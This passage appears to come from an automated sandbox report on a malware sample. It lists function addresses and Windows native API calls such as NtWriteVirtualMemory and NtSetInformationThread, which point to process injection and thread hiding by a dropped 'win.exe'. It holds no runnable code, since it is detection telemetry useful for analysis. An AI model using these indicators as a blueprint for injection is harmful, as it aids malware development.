            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F5168 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F51B0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F49FC NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F463C NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4E38 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4E78 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9E6C NtResumeThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4698 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4EA7 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4ED0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F46E0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F473C NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4F2C NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F8726 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4F55 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4F79 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F5F80 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4FAC NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F47DA NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9C18 NtResumeThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9C08 NtResumeThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9C50 NtResumeThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4C44 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F1C7E NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9C6C NtResumeThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9C98 NtResumeThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9C88 NtResumeThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9CB4 NtResumeThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4CA4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9CDC NtResumeThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F44FF NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9CFC NtResumeThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F5510 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4D36 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9D20 NtResumeThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4554 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4D90 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9DBC NtResumeThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F8DBB NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F95AF NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4DD4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F45F2 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B49AFE NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B40BF8 NtWriteVirtualMemory,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B486C3 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B40703 EnumWindows,NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B45F4C NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B495F4 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B44AE1 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B452C4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B45224 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B44BB4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B49BB0 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B4538C NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B49BE0 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B453E8 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B49B30 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B49B14 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B45310 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B49B76 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B49B54 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B44B5F NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B49B58 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B44880 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B4508A NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B460F4 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B450C0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B44834 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B4601C NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B45003 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B46074 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B451B0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B449FC NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B46138 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B45110 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B44907 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B44970 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B45168 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B44EA7 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B44698 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B446E0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B44ED0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B4463C NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B44E38 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B44E78 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B49E6C NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B44FAC NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B45F80 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B447DA NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B4473C NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B48726 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B44F2C NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B44F79 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B44F55 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B49CB4 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B44CA4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B49C98 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B49C88 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B49CFC NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B444FF NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B49CDC NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B49C18 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B49C08 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B41C7E NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B49C6C NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B49C50 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B44C44 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B49DBC NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B48DBB NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B495AF NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B44D90 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B445F2 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B44DD4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B44D36 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B49D20 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B45510 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B44554 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A9AFE NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A0BF8 NtWriteVirtualMemory,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A86C3 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A0703 EnumWindows,NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A5F4C NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A95F4 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A5224 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A52C4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A4AE1 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A5310 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A9B14 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A9B30 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A9B58 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A4B5F NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A9B54 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A9B76 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A538C NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A9BB0 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A4BB4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A53E8 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A9BE0 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A5003 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A601C NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A4834 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A6074 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A508A NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A4880 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A50C0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A60F4 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A4907 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A5110 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A6138 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A5168 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A4970 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A51B0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A49FC NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A4E38 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A463C NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A9E6C NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A4E78 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A4698 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A4EA7 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A4ED0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A46E0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A4F2C NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A8726 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A473C NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A4F55 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A4F79 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A5F80 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A4FAC NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A47DA NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A9C08 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A9C18 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A4C44 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A9C50 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A9C6C NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A1C7E NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A9C88 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A9C98 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A4CA4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A9CB4 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A9CDC NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A44FF NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A9CFC NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A5510 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A9D20 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A4D36 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A4554 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A4D90 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A95AF NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A8DBB NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A9DBC NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A4DD4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A45F2 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00569AFE NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00560BF8 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_005695F4 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00565F4C NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00566074 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_0056601C NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_005660F4 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00566138 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00569B54 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00569B58 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00569B76 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00569B14 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00569B30 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00569BE0 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00569BB0 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00569C50 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00569C6C NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00569C18 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00569C08 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00569CDC NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00569CFC NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00569C98 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00569C88 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00569CB4 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00569D20 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_0056158E NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_005615BC NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00569DBC NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_005695AF NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00561670 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00569E6C NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00561604 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00565F80 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00560BF8 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005695F4 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00565F4C NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00566074 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_0056601C NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005660F4 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00566138 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_0056158E NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005615BC NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005695AF NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00561670 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00561604 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00565F80 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeFile created: C:\Windows\Lwo7Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9AFE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0BF8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A86C3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0703
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A5F4C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A1210
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A5224
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A3A49
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A1259
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A2A5D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A2A50
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A3A80
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A1286
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A12A4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A2AC0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A52C4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A92D4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A3AEC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A12E0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4AE1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A2AF4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A131B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A5310
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9B14
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9B30
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A1331
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A2B34
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0335
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A1348
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A3B44
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9B58
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4B5F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A135C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9B54
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0378
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9B76
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A538C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A2B84
